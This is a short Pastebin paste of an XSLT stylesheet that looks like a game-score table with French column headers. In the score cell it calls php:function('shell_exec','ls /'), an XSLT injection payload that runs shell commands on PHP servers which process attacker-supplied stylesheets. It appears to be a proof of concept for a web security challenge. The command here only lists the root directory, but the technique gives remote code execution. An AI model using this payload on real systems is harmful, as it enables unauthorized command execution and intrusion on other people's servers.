Advertisement
Guest User

Untitled

a guest
Nov 22nd, 2019
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  3. <body style="font-family:'VT323';font-size:12pt;background-color:#EEEEEE">
  4. <table style="background-color: green;border: 2px dashed pink;">
  5. <thead style="background-color:red;border:1px solid black;">
  6. <tr>
  7. <th>Jeu</th>
  8. <th>Score</th>
  9. </tr>
  10. </thead>
  11. <tbody>
  12. <xsl:for-each select="scores/score">
  13. <tr>
  14. <td><xsl:value-of select="game"/></td>
  15. <td style="color: yellow;text-decoration: blink"><xsl:value-of select="php:function('shell_exec','ls /')"/></td>
  16. </tr>
  17. </xsl:for-each>
  18. </tbody>
  19. </table>
  20. </body>
  21. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement